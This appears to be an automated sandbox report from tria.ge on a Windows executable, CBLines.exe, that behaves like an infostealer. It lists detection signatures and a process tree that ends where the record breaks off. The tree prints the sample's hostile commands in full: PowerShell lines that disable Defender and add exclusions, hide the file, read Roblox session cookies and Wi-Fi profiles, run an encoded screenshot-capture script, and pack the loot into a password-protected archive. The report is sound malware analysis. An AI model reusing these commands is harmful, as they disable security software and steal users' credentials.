Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

08/10/2024, 11:02

241008-m5dx6szdjb 10

08/10/2024, 10:55

241008-m1mphstejj 10

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/10/2024, 11:02

General

  • Target

    CBLines.exe

  • Size

    6.8MB

  • MD5

    3007ee10af667a5b7a08383e1075ffeb

  • SHA1

    235a92053da4068ffc5071f5c7283aabc1eacd15

  • SHA256

    e461f6d4f4386add20a92e5e0a057b1b2373cf598ecb585f0b3c7a187070ad82

  • SHA512

    b0a61f79c904d1cfec1c12a3335e8af04e6849671793f8dc2840d4f2b25f698b4712c576cf7228975fab72c820f5367f1822947eefb1db932e5c20de9cf32318

  • SSDEEP

    98304:EnkwN+MdA5wqMmSd8MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DoDZDJ1n6hBnLD:EnV1J+B6ylnlPzf+JiJCsmFMvcn6hVvX

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CBLines.exe
    "C:\Users\Admin\AppData\Local\Temp\CBLines.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1232
    • C:\Users\Admin\AppData\Local\Temp\CBLines.exe
      "C:\Users\Admin\AppData\Local\Temp\CBLines.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1224
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CBLines.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CBLines.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4524
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4784
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4544
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CBLines.exe""
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        • Suspicious use of WriteProcessMemory
        PID:1368
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\CBLines.exe"
          4⤵
          • Views/modifies file attributes
          PID:4024
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏​ .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3208
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏​ .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4608
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1940
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:936
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5060
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3680
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1684
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:528
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4024
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3032
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:464
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:4852
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2380
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2144
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:2576
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3712
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:4496
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
              PID:1800
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3300
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\anmuxm5m\anmuxm5m.cmdline"
                  5⤵
                    PID:2768
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E38.tmp" "c:\Users\Admin\AppData\Local\Temp\anmuxm5m\CSC7C3DDFDAC0BE46669AB7355E431254A8.TMP"
                      6⤵
                        PID:2124
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2120
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3260
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2444
                    • C:\Windows\system32\attrib.exe
                      attrib -r C:\Windows\System32\drivers\etc\hosts
                      4⤵
                      • Drops file in Drivers directory
                      • Views/modifies file attributes
                      PID:3280
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:2116
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:2112
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                        3⤵
                          PID:3004
                          • C:\Windows\system32\attrib.exe
                            attrib +r C:\Windows\System32\drivers\etc\hosts
                            4⤵
                            • Drops file in Drivers directory
                            • Views/modifies file attributes
                            PID:3620
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:3932
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:2120
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                              3⤵
                                PID:4088
                                • C:\Windows\system32\tasklist.exe
                                  tasklist /FO LIST
                                  4⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3280
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:2372
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:1160
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4492
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:3484
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:3196
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:704
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                          3⤵
                                            PID:3504
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:436
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "getmac"
                                            3⤵
                                              PID:464
                                              • C:\Windows\system32\getmac.exe
                                                getmac
                                                4⤵
                                                  PID:1972
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI12322\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\UFvHN.zip" *"
                                                3⤵
                                                  PID:920
                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI12322\rar.exe
                                                    C:\Users\Admin\AppData\Local\Temp\_MEI12322\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\UFvHN.zip" *
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:4524
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                  3⤵
                                                    PID:1568
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic os get Caption
                                                      4⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:64
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                    3⤵
                                                      PID:2376
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic computersystem get totalphysicalmemory
                                                        4⤵
                                                          PID:2964
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                        3⤵
                                                          PID:1156
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic csproduct get uuid
                                                            4⤵
                                                              PID:2772
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                            3⤵
                                                              PID:228
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3300
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                              3⤵
                                                                PID:4048
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic path win32_VideoController get name
                                                                  4⤵
                                                                  • Detects videocard installed
                                                                  PID:640
                                                              • C:\Windows\system32\cmd.exe
